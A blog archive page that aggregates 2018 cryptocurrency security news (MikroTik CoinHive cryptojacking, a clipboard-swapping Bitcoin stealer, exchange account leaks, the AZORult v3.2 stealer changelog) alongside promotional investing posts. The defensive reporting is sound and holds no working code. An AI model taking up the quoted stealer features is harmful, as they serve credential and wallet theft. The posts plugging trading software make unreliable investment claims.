Category Archives: cryptocurrency

Naked Security – Sophos: How a cryptocurrency-destroying bug almost didn’t get reported

A researcher recently revealed how he found a bug that could have brought the fourth largest cryptocurrency to its knees – and how he was almost unable to report it.

Naked Security - Sophos

Does the future of cryptocurrency lie in each country having its own?

Cryptocurrencies have undoubtedly proven their credentials as a pioneering and disruptive innovation. In 2017, the world sat up and took notice as Bitcoin ballooned from below US$1,000 to almost US$20,000 – with plenty of rises and falls along the way – in a crazy 12 months that captured headlines worldwide.

Whether you were gripped by this exciting ‘new’ asset and are just working out how to trade by brushing up on an options trading tutorial, or are concerned about what this means for the future of the established system of currencies and payments, what happens next matters.

The challenges faced by cryptocurrency

Perhaps inevitably, the rise of cryptocurrencies such as Bitcoin has led to challenges. Firstly, there are a lot of people with vested interests in the existing system that have been left red-faced by the rise of an asset that is free from regulation by central banks.

On top of that, the strengths of cryptocurrencies have been exploited by people engaged in criminal activity. People engaged in the sale of illegal goods have been attracted by the privacy and anonymity offered, while scammers have jumped on the opportunity to create or worsen volatility to make quick money.

A combination of all of these factors has led to regulators in places such as South Korea to introduce regulation on the way cryptocurrencies are bought and used.

Location-based solutions

If nations and regions impose rules and regulations on the likes of Bitcoin, will this spell trouble for the long-term future of cryptocurrencies? Not necessarily. The blockchain technology involved in digital payment formats is widely seen as having great potential to help speed up the transfer of money and help payments to be safe and secure.

One way of harnessing the essence of cryptocurrencies – while still maintaining a sense of control – is for states, cities or regions to establish their own. New rivals to Bitcoin are springing up all the time but recently these have taken on a geographic feel.

Over in South Korea, for example, Seoul City has announced plans to unveil S-Coin, a cryptocurrency that could be used in welfare programmes around the city.

Back at the end of last year, Dubai’s government launched the blockchain-based emCash currency. Using its emWallet payment system people can use this to buy everything from ‘their daily coffee and children’s school fee to utility charges and money transfers’ using near-field communication.

Dubai Economy deputy director general Ali Ibrahim said: “A digital currency has varied advantages – faster processing, improved delivery time, less complexity and cost, to name a few. It will change the way people live and do business in Dubai, and mark a giant leap for the city in harnessing game-changing innovations to improve ease of business and quality of life.”

Cryptocurrencies are ‘an experiment’

As with anything to do with cryptocurrencies, however, it remains to be seen how or why this will develop.

Singapore’s central bank has vowed to keep a close eye on developments elsewhere – weighing up the risks and success of the regulation drawn up in reaction to them.

In a written answer to a question from politicians on banning the trading of cryptocurrency, Deputy Prime Minister Tharman Shanmugaratnam said: “Cryptocurrencies are an experiment. The number and different forms of cryptocurrencies is growing internationally. It is too early to say if they will succeed. If some do succeed, their full implications will also not be known for some time.”

He added: “The Monetary Authority of Singapore (MAS) has been closely studying these developments and the potential risks they pose. As of now, there is no strong case to ban cryptocurrency trading here.”

Don’t ignore the power of Bitcoin

It remains to be seen whether or not location-specific cryptocurrencies can take off. While they might have the support of central banks and governments, the cryptocurrency movement so far has been defined by the hopes and wishes of the users. If they show an appetite to use Bitcoin or similar rivals then it will be difficult to knock this off its perch.

Bitcoin has established itself as the market leader and might well weather the storm of scams and regulations. In fact, these might just serve to help to legitimize the sector in the eyes of those who are still wary of this type of asset.

Twitter CEO Jack Dorsey believes that Bitcoin will become a dominant currency over the next decade.

Dorsey, who is also chief executive of crypto-friendly mobile payment firm Square, recently said: “The world ultimately will have a single currency, the internet will have a single currency. I personally believe that it will be bitcoin… probably over ten years, but it could go faster.”

Whether country, city or region-specific cryptocurrencies take off or not, it’s clear that they are one of the many ways in which people are trying to shape the future of this fast-changing market, especially for politicians and central banks who would like to establish a sense of control over the way this sector heads.

The post Does the future of cryptocurrency lie in each country having its own? appeared first on TechWorm.

Cyber Criminals selling Bitcoin ATM Malware on Dark Web

By Uzair Amir

Trend Micro researchers have discovered a malware listing on Dark Web marketplace that lets attackers steal from Bitcoin ATMs. They can easily rake in cryptocurrency worth 6,750 in Euros, Pounds or Dollars by attacking the ATMs. The listing was perhaps created on June 25, 2018. It is available at a whopping price tag of $25,000. […]

This is a post from Read the original post: Cyber Criminals selling Bitcoin ATM Malware on Dark Web

Massive Router Attack Injects CoinHive Malware Using Winbox Bug

Security researchers observed a massive router attack in which threat actors injected CoinHive into more than 170,000 devices to mine for Monero.

On July 31, security firm Trustwave detected a substantial CoinHive uptick in Brazil and identified MikroTik routers as the infection point upon further investigation. By leveraging CVE-2018-14847, a critical Winbox flaw, attackers gathered sensitive information from target devices and then gained unauthenticated, remote admin access. This tactic allowed them to inject the CoinHive script, which uses system resources to mine for Monero.

Although the majority of infected devices are in Brazil, this router attack is gaining ground internationally, according to the report.

The Impact of Malicious Miners

Crypto-mining malware eats up system resources, which could cause performance issues and compromise overall network security. For this attack, the threat actors targeted carrier-grade routers that serve global industries and internet service providers (ISPs) — increasing their reach and making it difficult for security teams to eliminate all CoinHive instances.

According to Trustwave, this impacts “users who are not directly connected to the infected router’s network,” as well as those who “visit websites behind these infected routers.”

As the campaign spread worldwide, researchers discovered a placeholder script (u113.src) and a backdoor account (called “ftu”) that allows attackers to send additional commands to any compromised device. Given the sheer number of devices impacted, the campaign could easily shift from simple crypto-mining to ransomware or complete network compromise.

How to Mitigate the Risk of a Router Attack

Although MikroTik released a fix for the flaw in April 2018, Trustwave noted that “there are hundreds of thousands of unpatched (and thus vulnerable) devices still out there.”

To limit the risk of vulnerabilities like the Winbox bug, IBM Security experts recommend implementing strict patch management policies and prioritizing security information and event management (SIEM) logs — so routers don’t get lost in the mix. While routers may go several days without sending a log, it’s important to review these logs regularly to ensure that CoinHive or other malware hasn’t set up shop.

Mitigating the impact of cryptojacking malware also requires a more active and decisive approach to risk management. Given the rapidly expanding market share of coin mining tools, security experts advise organizations to reevaluate potential areas of risk, impacts of compromise and potential long-term effects to create an actionable risk mitigation plan.

Sources: Trustwave, MikroTik

The post Massive Router Attack Injects CoinHive Malware Using Winbox Bug appeared first on Security Intelligence.

E Hacking News – Latest Hacker News and IT Security News: A New Malicious Campaign Whip Around $60,000 of Bitcoin

July 2018, saw the reports of a recently discovered malicious campaign by the Fortiguard Labs. The campaign "Bitcoin Stealer" is as of now held responsible of stealing roughly $60,000 worth in Bitcoin.

The researchers from the FortiGuard Labs initially ran over a threat that at first coordinated a few tenets particular to the Jigsaw ransom ware back in April 2018, yet later on after a considerably more critical look it was revealed that the threat, which contained the assembly name "BitcoinStealer.exe," did not figure like a ransom ware at all.

As unlike to ransom ware, the Bitcoin Stealer rather used an executable to screen the contaminated PC's clipboard content for indications of a bitcoin address. When it finds one of these addresses, the malware at that point replaces that replicated bitcoin address with an alternate one containing similar strings at both the start and the end of that wallet address.

By using this technique, the malware basically mixes itself specifically into bitcoin transactions and after that, halfwit users into transferring cryptocurrency to the wallet of the cybercriminal utilizing Bitcoin Stealer.

As indicated by Techopedia, these stealing programs are cases of clipboard hijacking, an attack strategy through which attackers generally change clipboard content to guide browser users to a malignant website.The Programmers however, are additionally known to utilize a strategy called "pastejacking" to meddle with commands replicated from a web browser and paste into the terminal.

The question though that arises now is thusly aimed at the security specialists with respect to whether there will be sufficient insurance given against such episodes of clipboard modification attacks as digital attackers indeed have a long history of targeting clipboards in order to steal cryptocurrency or redirect users to malware.

E Hacking News - Latest Hacker News and IT Security News

A New Malicious Campaign Whip Around $60,000 of Bitcoin

July 2018, saw the reports of a recently discovered malicious campaign by the Fortiguard Labs. The campaign "Bitcoin Stealer" is as of now held responsible of stealing roughly $60,000 worth in Bitcoin.

The researchers from the FortiGuard Labs initially ran over a threat that at first coordinated a few tenets particular to the Jigsaw ransom ware back in April 2018, yet later on after a considerably more critical look it was revealed that the threat, which contained the assembly name "BitcoinStealer.exe," did not figure like a ransom ware at all.

As unlike to ransom ware, the Bitcoin Stealer rather used an executable to screen the contaminated PC's clipboard content for indications of a bitcoin address. When it finds one of these addresses, the malware at that point replaces that replicated bitcoin address with an alternate one containing similar strings at both the start and the end of that wallet address.

By using this technique, the malware basically mixes itself specifically into bitcoin transactions and after that, halfwit users into transferring cryptocurrency to the wallet of the cybercriminal utilizing Bitcoin Stealer.

As indicated by Techopedia, these stealing programs are cases of clipboard hijacking, an attack strategy through which attackers generally change clipboard content to guide browser users to a malignant website.The Programmers however, are additionally known to utilize a strategy called "pastejacking" to meddle with commands replicated from a web browser and paste into the terminal.

The question though that arises now is thusly aimed at the security specialists with respect to whether there will be sufficient insurance given against such episodes of clipboard modification attacks as digital attackers indeed have a long history of targeting clipboards in order to steal cryptocurrency or redirect users to malware.

HOTforSecurity: No cryptocurrency exchange can fully guarantee security, researchers say

2017 saw many risk-takers rack up small fortunes by riding the Bitcoin wave, but some ended up in tears — their accounts hacked and their crypto-wallets emptied. While you might be tempted to blame the wallet’s owner for such a mishap, it’s not that simple.

An investigation into two years’ worth of data leaks from cryptocurrency exchanges reveals that hackers aren’t exactly having a hard time hacking into cryptocurrency exchange services. A good example was the case in June of South Korea’s Coinrail, which lost about £28 million / $36 million to hackers. Crypto-fans might remember that the cyber-attack instantly sent the price of Bitcoin tumbling 10%.

Group-IB has found that, from 2016 to 2017, the number of cryptocurrency-related data leaks soared by 369%, while the first month of 2018 set a record.

“Due to growing interest in cryptocurrencies and the blockchain industry, in January the number of incidents jumped by 689% compared to the 2017 monthly average,” researchers said.

The USA, Russia and China are the primary targets, and every third victim of the attack is an American. The US also hosts 56.1% of criminal C&C servers belonging to cryptocurrency hackers, followed by the Netherlands (21.5%), Ukraine (4.3%) and Russia (3.2%).

Attackers use techniques ranging from simple social engineering methods to more sophisticated trojan deployments, leveraging tools like AZORult and Pony Formgrabber, and Qbot. Cybercrooks are also repurposing tools previously used in bank attacks.

So, why are cryptocurrency exchanges such sitting ducks?

The answer, according to researchers, is simpler than one might like to believe: “disregard for information security and underestimating the capabilities of cybercriminals. The first and main cause is that both users and exchanges omit to use two-factor authentication. The second cause is disregard for basic security rules such as the use of complex and unique passwords.”

Analyzing 720 accounts, Group-IB found that one in five uses a password shorter than 8 characters – a dangerous practice, considering how successful brute force attacks can be against weak passwords.

After analyzing circumstances of other exchanges that got hacked – including Bitfinex, Bithumb, Bitstamp, HitBTC, and Poloniex – researchers drew the following conclusion:

“Currently no cryptocurrency exchange, regardless of its size and track record, can guarantee absolute security to its users.”

This chilling conclusion alone should send shivers down the spines of those who sold expensive goods to hop on the Bitcoin bandwagon – or at least it should prompt them to set a stronger password.

Other attack vectors identified by researchers included: errors in the source code of the software; phishing attacks; unauthorized access to the user database; vulnerabilities related to storage; and withdrawal of funds.

“However, all of them stem from the lack of attention to information security and protection of digital assets,” researchers emphasized.

As far as crypto-exchanges are concerned, considering the kind of business they run and how a breach can affect their customers’ lives, two-factor authentication should be the absolute minimum level of protection for customer accounts. Unfortunately, not all of them enforce this practice, the research revealed.


No cryptocurrency exchange can fully guarantee security, researchers say

2017 saw many risk-takers rack up small fortunes by riding the Bitcoin wave, but some ended up in tears — their accounts hacked and their crypto-wallets emptied. While you might be tempted to blame the wallet’s owner for such a mishap, it’s not that simple.

An investigation into two years’ worth of data leaks from cryptocurrency exchanges reveals that hackers aren’t exactly having a hard time hacking into cryptocurrency exchange services. A good example was the case in June of South Korea’s Coinrail, which lost about £28 million / $36 million to hackers. Crypto-fans might remember that the cyber-attack instantly sent the price of Bitcoin tumbling 10%.

Group-IB has found that, from 2016 to 2017, the number of cryptocurrency-related data leaks soared by 369%, while the first month of 2018 set a record.

“Due to growing interest in cryptocurrencies and the blockchain industry, in January the number of incidents jumped by 689% compared to the 2017 monthly average,” researchers said.

The USA, Russia and China are the primary targets, and every third victim of the attack is an American. The US also hosts 56.1% of criminal C&C servers belonging to cryptocurrency hackers, followed by the Netherlands (21.5%), Ukraine (4.3%) and Russia (3.2%).

Attackers use techniques ranging from simple social engineering methods to more sophisticated trojan deployments, leveraging tools like AZORult and Pony Formgrabber, and Qbot. Cybercrooks are also repurposing tools previously used in bank attacks.

So, why are cryptocurrency exchanges such sitting ducks?

The answer, according to researchers, is simpler than one might like to believe: “disregard for information security and underestimating the capabilities of cybercriminals. The first and main cause is that both users and exchanges omit to use two-factor authentication. The second cause is disregard for basic security rules such as the use of complex and unique passwords.”

Analyzing 720 accounts, Group-IB found that one in five uses a password shorter than 8 characters – a dangerous practice, considering how successful brute force attacks can be against weak passwords.

After analyzing circumstances of other exchanges that got hacked – including Bitfinex, Bithumb, Bitstamp, HitBTC, and Poloniex – researchers drew the following conclusion:

“Currently no cryptocurrency exchange, regardless of its size and track record, can guarantee absolute security to its users.”

This chilling conclusion alone should send shivers down the spines of those who sold expensive goods to hop on the Bitcoin bandwagon – or at least it should prompt them to set a stronger password.

Other attack vectors identified by researchers included: errors in the source code of the software; phishing attacks; unauthorized access to the user database; vulnerabilities related to storage; and withdrawal of funds.

“However, all of them stem from the lack of attention to information security and protection of digital assets,” researchers emphasized.

As far as crypto-exchanges are concerned, considering the kind of business they run and how a breach can affect their customers’ lives, two-factor authentication should be the absolute minimum level of protection for customer accounts. Unfortunately, not all of them enforce this practice, the research revealed.

Update MikroTik routers – 170,000 devices hit by cryptocurrency malware

By Waqas

Currently, the malware is targeting unpatched MikroTik routers in Brazil but researchers believe it’s about time it will spread worldwide. Unpatched routers manufactured by MikroTik have become potential targets of cryptojacking malware campaigns in Brazil. According to the analysis of Trustwave’s security researcher Simon Kenin, an unprecedented increment in web-based cryptojacking/cryptomining attacks in Brazil has […]

This is a post from Read the original post: Update MikroTik routers – 170,000 devices hit by cryptocurrency malware

Users Played by Cryptojacking Scam on Popular Gaming Platform

A new cryptojacking scam masquerading as a video game garnered 6,000 downloads before being removed from the popular cloud-based platform on which it was hosted.

The game, called “Abstractism,” appeared on gaming distribution platform Steam after parent company Valve adopted an “anything goes policy” for its digital store, Fortune reported in July 2018. According to Motherboard, the game was originally released in March 2018 by developer Okalo Union and publisher as a “trivial platformer,” which has players move blocks in a 2D space to the sound of soothing music.

Despite the game’s minimalist graphics and lightweight concept, users began noticing device performance issues and discovered that the program was conducting significant amounts of network communication. The developers also encouraged users to leave the game running in the background for a chance to obtain rare items. Although patch notes expressly stated that the game was not crypto-mining malware, mounting evidence to the contrary forced Steam to remove it on July 30.

Gaming Platforms Are Not All Fun and Games

The threat posed by cryptojacking scams such as Abstractism is particularly concerning for security professionals because many companies are hiring gamers to help close the IT skills gap — meaning there’s a greater chance that this type of malware could compromise business networks.

Although the game does trigger Windows Defender and antivirus alerts, its lightweight nature makes it easy to overlook these red flags — even as it hogs both central processing unit (CPU) and graphics processing unit (GPU) resources. It doesn’t take much for malware makers to create crypto-mining code — in fact, the smaller, the better.

Steam’s move to an open marketplace is also worrisome, and not just because companies will suddenly be inundated with thousands of “Abstractism” copies. With cloud-based marketplaces no longer attempting to control every piece of software they offer, the responsibility for overseeing games, productivity tools and open-source offerings has shifted to corporate IT teams.

How to Minimize the Threat of Cryptojacking

To avoid costly losses due to cryptojacking games and other malicious apps, IBM Security experts recommend implementing advanced security information and event management (SIEM) and behavioral analytics tools to detect high CPU and GPU usage.

Security experts also suggest using a managed cloud access security broker (CASB) to help mitigate the impact of shadow IT — which, in this case, could include crypto-mining games downloaded onto business devices and any other cloud-based apps that aren’t approved by IT teams.

Sources: Fortune, Motherboard

The post Users Played by Cryptojacking Scam on Popular Gaming Platform appeared first on Security Intelligence.

Group-IB experts record a massive surge of user data leaks form cryptocurrency exchanges

Group-IB researchers have investigated user data leaks from cryptocurrency exchanges and has analyzed the nature of these incidents.

Security experts from Group-IB, an international company specializing in preventing cyberattacks and developing information security solutions, has investigated user data leaks from cryptocurrency exchanges and has analyzed the nature of these incidents. Within a year, the number of data leaks soared by 369%.

The USA, Russia and China are TOP-3 countries in which registered users became the victims of cyberattacks.

In 2017, when cryptocurrencies were gaining momentum, their record-breaking capitalization and a spike in Bitcoin’s exchange rate led to dozens of attacks on cryptocurrency services. Based on data obtained from the Group-IB Threat Intelligence (cyber intelligence) system, experts from the international company Group-IB have analyzed the theft of 720 user accounts (logins and passwords) from the 19 largest cryptocurrency exchanges

January holidays for hackers: a 689% surge in the number of leaks

The report «2018 Cryptocurrency Exchanges. User Accounts Leaks Analysis»shows a steady increase in the number of compromised user accounts on cryptocurrency exchanges. In 2017, their number increased by 369% compared to 2016. The first month of 2018 set a record: due to growing interest in cryptocurrencies and the blockchain industry, in January the number of incidents jumped by 689% compared to the 2017 monthly average. The USA, Russia, and China are the countries where users are targeted most often. The study has shown that every third victim of the attack is located in the United States.

cryptocurrency exchanges affected

Toolkit and infrastructure used for attacks

Experts of Group-IB have identified 50 active botnets used for launching cyberattacks on cryptocurrency exchanges users. The infrastructure used by cybercriminals is mainly based in the USA (56.1%), the Netherlands (21.5%), Ukraine (4.3%) and Russia (3.2%).

cryptocurrency exchanges affected

The attackers use an increasingly wide range of malicious software and update their tools on a regular basis. The most frequently used malicious software includes Trojans such as AZORult and Pony Formgrabber, as well as the Qbot. At the same time, cybercriminals have modified tools previously used for attacks on banks and now successfully use them to hack cryptocurrency exchanges and gain access to users’ personal data.

What makes a successful attack possible?

This is one of the key issues covered in the Group-IB report. The answer is actually quite simple: disregard for information security and underestimating the capabilities of cybercriminals. The first and main cause is that both users and exchanges omit to use two-factor authentication. The second cause is disregard for basic security rules such as the use of complex and unique passwords.

Group-IB has analyzed 720 accounts and found that one out of five users chose a password shorter than 8 characters (see Figure).

cryptocurrency exchanges affected

Attack as a premonition

Experts of Group-IB draw a bleak conclusion: currently no cryptocurrency exchange, regardless of its size and track record, can guarantee absolute security to its users. At least 5 out of 19 exchanges in question fell victim to targeted cyberattacks widely covered by the media. These are Bitfinex, Bithumb, Bitstamp, HitBTC, Poloniex and, presumably, Huobi. There are various attack vectors: errors in the source code of the software, phishing attacks, unauthorized access to the user database, vulnerabilities related to storage and withdrawal of funds. However, all of them stem from the lack of attention to information security and protection of digital assets.

“Increased fraudulent activity and attention of hacker groups to cryptoindustry, additional functional of malicious software related to cryptocurrencies, as well as the significant amounts of already stolen funds, signals that the industry is not ready to defend itself and protect its users”, says Ruslan Yusufov, the Director of Special Projects at Group-IB. “In 2018 we will see even more incidents. This situation requires prompt and effective response of all stakeholders, including experts in different areas.”

Recommendations of Group-IB experts to users and exchanges

In order to protect one’s funds against crypto-fraud, Group-IB recommends users to be mindful of their passwords (which should contain at least 14 unique symbols), never use the same passwords for different exchanges and always enable the 2FA (two-factor authentication). Experts recommend avoiding the use of public Wi-Fi (at least when carrying out exchange transactions) and paying special attention to one’s “traces” on the social media. For instance, users should not demonstrate the fact that they possess any cryptocurrency.

Recommendations to cryptoexchanges are also of high importance. First of all, they are strongly advised to make two-factor authentication obligatory for all the users and their operations, conduct regular security audits of IT infrastructure and related services, and allocate resources to training and awareness-raising concerning personnel security, starting from top management (founders) and down to rank-and-file employees. To improve the cybersecurity of cryptocurrency exchanges, experts also recommend installing Anti-APT solutions, using Threat Intelligence and implementing anti-fraud solutions, as well as behavioral analysis systems. Specialists also suggest preparing cybersecurity incident response plans which will minimize potential damage.

About the Author: Group-IB Corporate Communications

telegram | facebook | twitter | linkedin

Pierluigi Paganini

(Security Affairs – data leak, cryptocurrency exchanges)

The post Group-IB experts record a massive surge of user data leaks form cryptocurrency exchanges appeared first on Security Affairs.

Clever cryptojacking campaign targets MicroTik routers. If you own one, patch now!

Hackers are conducting several malware campaigns involving cryptojacking tools and vulnerable MikroTik routers. Their clever technique eliminates the need to infect websites with cryptojacking malware, and instead shifts the focus onto unpatched routers enabling them to reach many more endpoints, while not restricting mining to a single web page.

Researchers have discovered at least three separate campaigns, two of which have been seen unfolding in Brazil and Moldova. In total, 210,000 routers from MikroTik have been involved in the campaign.

Because hackers are leveraging a known bug in unpatched routers, they have created an entry point that enables them to mine cryptocurrency using all the computers connected to that router. Their miner of choice is (perhaps not surprisingly to some) none other than the infamous Coinhive.

Trustwave researcher Simon Kenin explains:

“The attacker created a custom error page with the CoinHive script in it [and] if a user receives an error page of any kind while web browsing, they will get this custom error page which will mine CoinHive for the attacker.”

The hack exploits a known vulnerability in the Winbox component of MikroTik routers, a flaw that was reportedly discovered in April this year and patched within the next day. However, numerous such routers remain unpatched, as it is usually the case when the updating process is shouldered both by the vendor and the end user.

IT managers and average Joes alike should install the latest MikroTik firmware as soon as possible. While cryptojacking isn’t the most dangerous thing in the world, it’s nonetheless a practice sanctioned by security experts everywhere. Plus, you never know when a known vulnerability gets exploited for more nefarious purposes, such as ransomware. In short, patch now!

Hackers Infect Over 200,000 MikroTik Routers With Crypto Mining Malware

Security researchers have discovered at least three massive malware campaigns exploiting hundreds of thousands of unpatched MikroTik routers to secretly install cryptocurrency miners on computers connected to them. In all, the malware campaigns have compromised more than 210,000 routers from Latvian network hardware provider Mikrotik across the world, with the number still increasing as of

Malware Stealing Credentials via Office Documents

Recently the threat actors in charge of the AZORult malware released a refreshed variant with upgrades on both the stealer and the downloader functionalities. This was altogether done within a day after the new version had released a dark web user AZORult in a large Email campaign to circulate the Hermes ransomware.

The new campaign with the updated adaptation of AZORult is in charge of conveying thousands of messages focusing on North America with subjects, such as, "About a role" or "Job Application" and even contains the weaponized office document "firstname.surname_resume.doc” attached to it.

Researchers said, “The recent update to AZORult includes substantial upgrades to malware that was already well-established in both the email and web-based threat landscapes.”

Attackers have made use of the password-protected documents keeping in mind the end goal to avoid the antivirus detections. Once the client enters the password for documents, it requests to enable macros which thusly download the AZORult, and at that point it connects with the C&C server from the already infected machine and the C&C server responds with the XOR-encoded 3-byte key. 

Finally after exfiltrating stolen credentials from the infected machine, it additionally downloads the Hermes 2.1 ransomware.

Security analysts from Proofpoint even recognized the new version (3.2) of AZORult malware publicized in the underground forum with full changelog.

UPD v3.2
[+] Added stealing of history from browsers (except IE and Edge)
[+] Added support for cryptocurrency wallets: Exodus, Jaxx, Mist, Ethereum, Electrum, Electrum-LTC
[+] Improved loader. Now supports unlimited links. In the admin panel, you can specify the rules for how the loader works. For example: if there are cookies or saved passwords from, then download and run the file link[.]Com/soft.exe. Also, there is a rule “If there is data from cryptocurrency wallets” or “for all”
[+] Stealer can now use system proxies. If a proxy is installed on the system, but there is no connection through it, the stealer will try to connect directly (just in case)
[+] Reduced the load in the admin panel.
[+] Added to the admin panel a button for removing “dummies”, i.e. reports without useful information
[+] Added to the admin panel guest statistics
[+] Added to the admin panel a geobase

As indicated by the scientists, the malware campaign contains both the password stealer as well as the ransomware, which is astounding on the grounds that it is not so common to see both. Therefore, before causing a ransomware attack, the stealer would check for cryptocurrency wallets and steal the accreditations before the files are encrypted.

New Miner – PowerGhost Fileless Cryptominer Targets Corporate Networks.

The experts at Kaspersky security lab have identified a new miner. This comes at the time when the cryptocurrency rush

New Miner – PowerGhost Fileless Cryptominer Targets Corporate Networks. on Latest Hacking News.

How a man hacked his victims’ SIM cards to steal millions of dollars

By Waqas

Californian Authorities have arrested and charged a 20-year old college student Joel Ortiz for being part of a mobile phone hijacking group who hacked SIM cards. According to reports the detainee managed to hijack over 40 phone numbers and stole $5 million as well from high-profile targets including cryptocurrency investors. The Boston resident Ortiz was […]

This is a post from Read the original post: How a man hacked his victims’ SIM cards to steal millions of dollars

Tips for Bitcoin Investors who are New in this Field

If you are a new Bitcoin investor, you may find it quite intimidating. There are some tips which newcomers may use to maximize the chances of success. Continue reading on to find out more.

Do your research

Investors who are just started using Bitcoin should do their complete homework. Remember that if you understand much, then you can only come to know what is going on. Bitcoin gives a unique and rare opportunity and this opportunity should be treated accordingly and wisely. It is also known as Bitcoin’s underlying technology.

You should keep in mind that investing in crypto coins and tokens tends to be highly speculative. The market is mostly unregulated and unpredictable. Those who are thinking about investing here should be ready for some bad happenings as you can lose your whole investment.

You need to know about the blockchain, i.e., the distributed ledger system which underlies all digital currencies.

Start off by taking the time to understand the blockchain properly. You need to have much understanding about how a blockchain actually stores secure data (like coins).

It takes time to learn properly about Bitcoin. New investors may work with a good mentor. They wish to find some trusted person or even resource to discuss their queries as well as concerns to understand this market.

Go forward with caution

When it comes to investment, the risk is essential. You should remember that digital currency and asset markets are two different kinds of trading systems. You have to set a completely different strategy while dealing with digital trading.

It is really a high-risk area, therefore, do not invest any money that you cannot survive with if you lose it.

It can be a good idea, to begin with, a small amount. Invest only a tiny amount of your capital. Set an entry point then stick with this. With Bitcoin, one is almost always correct when it comes to foreseeable price action. In fact, it may be your timing which may be off. Therefore, be patient, allowing the Bitcoin price to come up.

When Bitcoin has arrived at the right price, investors should refrain from purchasing their Bitcoin all at one time. Rather invest only a little particularly at a time, then wait for some time, and then you can invest some more.

Diversify in an effective way

Over the last few years, Bitcoin developed some really impressive gains. There are also some media outlets that created some stories concerning “Bitcoin millionaires.”

These stories may encourage investors to place all their cash in Bitcoin, but remember that it is not advisable to put all your money in one place.

At the time when you are developing a diversified portfolio, you can look at altcoins, more tradition assets like stocks and bonds.

When it comes to diversification, you need to develop a portfolio when there is some decline within one component. It should correspond with some equal gain within another.

You need to know all about the Bitcoin market if will be involved in this. You can also check out different trading tools like the Bitcoin Trader Test as well.

The post Tips for Bitcoin Investors who are New in this Field appeared first on TechWorm.

A Review of How Digital Currency Technology Operates

Bitcoin is a sort of electronic currency that makes it possible for people to buy products or services and trade funds without involving banking institutions, creditors or any other organizations. Its roots have for ages been unknown — though an Aussie guy long said to have connections to bitcoin has stepped forward saying that he is its founder.

Who’s this guy, and exactly how does this particular system get the job done?

Here is a quick look at bitcoin:

How Bitcoins Work

Bitcoin is actually digital money that isn’t linked with a financial institution or even federal government and makes it possible for people to invest money anonymously. The particular coins are made by people who “mine” them by financing processing power to confirming various other users’ transactions. They get bitcoins as a swap.


Bitcoins are simply queues of computer program code that are electronically authorized every time they move from one proprietor to another. Financial transactions can easily be made anonymously, helping to make this currency well-liked by libertarians in addition to technology fanatics, investors — and crooks.

Trade-In Cash?

That has to be a doubtful choice. Many companies, for example, blogging service WordPress and retailer Overstock have leaped on the particular bitcoin bandwagon amid a lot of media coverage. Top bitcoin payment model BitPay harmonizes with more than 58,500 companies and businesses, as the final amount of bitcoin financial transactions has soared to over 250,000 on a daily basis, a lot more than triple from a year back, in accordance with bitcoin wallet website

Security and Safety

Typically, the bitcoin network system works by utilizing people’s hype for the combined good. A good network system of tech-savvy people known as miners who keep this system truthful by flowing their processing strength into a blockchain, a worldwide functional tally of each and every bitcoin financial transaction, plus they also use Bitcoin Loophole Test software to make sure that transactions are made smoothly with maximum profits. This blockchain helps prevent rogues from shelling out the exact same bitcoin 2 times, and also the miners are compensated for their initiatives by being paid with the periodic bitcoin. So long as miners keep this blockchain safe and secure, counterfeiting should not be a problem.


A lot of the trouble encompassing bitcoin comes about at the areas exactly where people keep their electronic funds or swap it for standard foreign currencies, such as dollars or pounds. In case a swap has careless security, or in case someone’s digital wallet is jeopardized, then the funds can easily be ripped off. The prevailing controversy concerned Japan-based bitcoin Mt. Gox, that proceeded to go offline in Feb 2014. Its Chief executive officer, Mark Karpeles, says thousands of bitcoins worth hundreds of million bucks were unaccounted for. This person was imprisoned on mistrust of bolstering his funds account in July.

How Bitcoin Came into Existence

It is an enigma. Bitcoin was released during 2009 by a man or group of individuals working under the name Satoshi Nakamoto. Bitcoin ended up being used by a small group of fanatics. Nakamoto dumped off the road as bitcoin started to attract prevalent interest. But promoters say that does not matter: The money minds its own central logic.

The post A Review of How Digital Currency Technology Operates appeared first on TechWorm.

John McAfee Announces $100K Bounty To Anyone Who Can Hack His BitFi Wallet

Amidst the recent wave of crypto hacks, John McAfee gave a brave challenge to crypto hackers. It is because of

John McAfee Announces $100K Bounty To Anyone Who Can Hack His BitFi Wallet on Latest Hacking News.

3 Amazing Business Ideas in Cryptocurrency Market

Every passing day, new opportunities for cryptocurrency business are opening. This is because of so many new cryptocurrencies are introduced in the market. Many people are interested only in making investments in this industry, while many like to do proper business by using these cryptocurrencies.

Here in this article, we will discuss three new business ideas that you can follow to start your business in the cryptocurrency market.  These ideas will be helpful in making a good structure for your business.

1.Cryptocurrency Exchange Trading

This idea about cryptocurrency business is possibly the best one. Owning a cryptocurrency trading website or cryptocurrency exchange business is an amazing option because this is the place where people will come and get an exchange for their various type of crypto coins. As you provide people with this exchange facility, you can charge them money for each exchange or transaction.

One thing to keep in mind is that the cryptocurrency exchange business is not at all similar to other exchange businesses that are already existing in the market. This business idea is a small setup in which the only a person is involved in the whole process. This system will act like the old stock exchange that will face price fluctuations as well.

2. Cryptocurrency ATM

Opening a cryptocurrency ATM is a great option of doing business in this industry. Currently, there are almost around 2000 cryptocurrency ATMs working all around the world. You can buy a machine and then set up your commission on it. Just like people are introducing new bitcoin trading software, such as Bitcoin Code System, the trend of introducing cryptocurrency ATM is also becoming popular because people get help from them.

In this business, there is also a third-party involvement that pushes you to use their facilities in running your ATM without any risk. It is a great option for you to earn money just by owning a machine that works automatically.

3. Run a Crypto Authority

Another type of business that you can start in the cryptocurrency industry is to become a crypto authority. As nowadays everyone is curious about the cryptocurrency and how this market works, the opportunities that it offers and the type of training one need to get to start working in this market, you can become a source for these people.

As you become an expert and know everything about this currency, you will be able to give your consultancy and advice to people for which you can charge money. As more people will get benefit from you, your market value will increase your number of customers will improve and ultimately your business will grow.

These are the business ideas that you can use to enter the cryptocurrency industry. The cryptocurrency market offers many other business options to its users, but one must first evaluate a business structure thoroughly, and then start working on it step by step. If you jump into it immediately after someone give you a business idea, you are probably going to face huge losses and eventually step back from it.

The post 3 Amazing Business Ideas in Cryptocurrency Market appeared first on TechWorm.

5 Advice for Common Mistakes Made by Cryptocurrency Traders

When you start trading in cryptocurrency, it is sure that you will face losses as well as gains during investment and while trying to make profits. But the important thing here is that you learn from your mistakes and make sure to avoid them in the future.

Here we are going to discuss some of the mistakes that most of the cryptocurrency traders make while dealing with cryptocurrency. The advice shared in this article will help you avoid them as you start your investments in the crypto market.

1.Wait for Price Consolidation

